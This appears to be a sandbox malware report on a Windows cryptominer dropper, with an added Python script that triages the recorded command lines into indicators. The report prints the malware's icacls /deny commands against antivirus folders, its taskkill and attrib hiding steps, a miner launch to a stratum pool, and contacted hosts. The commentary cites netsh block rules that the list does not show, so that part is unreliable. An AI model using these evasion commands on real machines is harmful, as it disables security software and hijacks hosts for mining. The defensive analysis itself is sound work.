icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny система:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny система:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\java.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\windows\svchost.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\kz.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\script.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\olly.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\lsass2.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny Администраторы:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\boy.exe /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM iediagcmd.exe /T /F

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

C:\Windows\SysWOW64\icacls.exe

icacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S "C:\Program Files\360\Total Security"

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows
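
The command lines above are the detonation's whole defence-evasion playbook: netsh block rules for a fixed set of remote IPs, icacls /deny against Administrators and SYSTEM on security-product and dropped-payload paths, taskkill /F, attrib +H +S, and finally an XMRig-style miner launched against a stratum pool. The script below is an added example, not part of this report, that triages such command lines as a responder would when reading sandbox or Sysmon event 1 output. The sample list is a subset of the lines recorded above; the regexes, category names, principal table and the code-page helper are this example's own assumptions. The helper exists because two of the icacls lines carry the principal as "└Σ∞ΦφΦ±≥≡α≥ε≡√": treated as Windows-1251 bytes rendered in CP437 those glyphs decode exactly to "Администраторы", which is what happens when a batch file saved in CP1251 (one of the .bat files launched just above) is run by cmd.exe on an English-locale host.

```python
"""Triage of sandbox-recorded command lines (added example, not part of this report).

The sample lines are copied from the Command Line section above; the regexes,
category names, principal table and the code-page helper are this example's own.
"""
import re

# Constructed sample: a representative subset of the command lines recorded above.
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11',
    'netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11',
    'netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236',
    r'icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)',
    r'icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)',
    r'icacls c:\windows\svchost.exe /deny система:(F)',
    r'icacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)',
    'TASKKILL /IM iediagcmd.exe /T /F',
    r'ATTRIB +H +S C:\Programdata\Windows',
    r'C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k -t4',
    r'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
]

# Principal names as they appear on English and Russian-localised Windows (lower-cased keys).
PRINCIPALS = {
    "administrators": "Administrators",
    "администраторы": "Administrators",
    "system": "SYSTEM",
    "система": "SYSTEM",
}


def undo_oem_mojibake(text: str) -> str:
    """Re-decode Windows-1251 text that cmd.exe read under OEM code page 437.

    A .bat saved in CP1251 and run on an English-locale host turns Cyrillic into
    box-drawing and Greek glyphs (the speechstracing line above). Text containing
    characters outside CP437, e.g. real Cyrillic, is returned unchanged.
    """
    try:
        return text.encode("cp437").decode("cp1251")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return text


def strip_cmd_wrapper(line: str) -> str:
    """Drop a leading 'cmd.exe /c' so the inner command is what gets matched."""
    return re.sub(r"^.*?\bcmd\.exe\s+/c\s+", "", line, count=1, flags=re.I)


def triage(cmdlines):
    """Classify each command line into the evasion categories seen in this detonation."""
    out = {"firewall_block": [], "acl_deny": [], "taskkill": [], "hide": [], "miner": []}
    for raw in cmdlines:
        line = strip_cmd_wrapper(raw.strip())
        m = re.match(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(.*)", line, re.I)
        if m:
            kv = {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', m.group(1))}
            if kv.get("action", "").lower() == "block" and "remoteip" in kv:
                out["firewall_block"].append((kv["remoteip"], kv.get("dir", "").upper()))
            continue
        m = re.match(r'icacls\s+("[^"]+"|\S+)\s+/deny\s+([^:]+):(\S+)', line, re.I)
        if m:
            principal = undo_oem_mojibake(m.group(2))
            out["acl_deny"].append({
                "path": m.group(1).strip('"'),
                "principal": principal,
                "resolved": PRINCIPALS.get(principal.lower()),   # None = name unknown to us
                "recursive": "(OI)" in m.group(3) and "(CI)" in m.group(3),
                "mojibake": principal != m.group(2),            # garbled on the recording host
            })
            continue
        m = re.match(r"taskkill\b(.*)", line, re.I)
        if m:
            img = re.search(r"/im\s+(\S+)", m.group(1), re.I)
            out["taskkill"].append((img.group(1) if img else None,
                                    bool(re.search(r"/f\b", m.group(1), re.I))))
            continue
        m = re.match(r"attrib\s+((?:[+-][hsra]\s+)+)(.+)", line, re.I)
        if m:
            flags = m.group(1).upper().split()
            if "+H" in flags:
                out["hide"].append((m.group(2).strip().strip('"'), "+S" in flags))
            continue
        m = re.search(r"stratum\+(?:tcp|ssl)://([^:/\s]+):(\d+)", line, re.I)
        if m:
            threads = re.search(r"(?<!\S)-t\s*(\d+)", line)
            out["miner"].append({"pool": m.group(1), "port": int(m.group(2)),
                                 "threads": int(threads.group(1)) if threads else None})
    return out


def iocs(findings):
    """Collapse findings into the indicator set a responder would record."""
    return {
        "blocked_ips": sorted({ip for ip, _ in findings["firewall_block"]}),
        "acl_targets": sorted({f["path"] for f in findings["acl_deny"]}),
        "pools": sorted(f"{m['pool']}:{m['port']}" for m in findings["miner"]),
    }


if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for category, items in found.items():
        print(category, len(items), items)
    print(iocs(found))
```

Two things the output makes visible that the raw list hides. First, icacls against a principal name the host cannot map to a SID fails and leaves the ACL untouched, so on a non-Russian Windows only the "Administrators"/"system" spellings take effect; the dropper issues both spellings for that reason, and the mojibake variants would have failed on the sandbox host. Second, the netsh rules block inbound and outbound TCP to specific addresses rather than opening anything; whatever those addresses are, they belong in the indicator set alongside the stratum pool at 185.139.69.167:3333, the ACL-protected drop paths and the miner's process name.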

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 stcubegames.netxi.in udp
UA 185.143.145.9:80 stcubegames.netxi.in tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 77.223.119.187:5655 rms-server.tektonit.ru tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 stcubegames.netxi.in udp
US 8.8.8.8:53 iplogger.org udp
UA 185.143.145.9:80 stcubegames.netxi.in tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
RU 109.248.203.81:21 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
RU 185.139.69.167:3333 tcp
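
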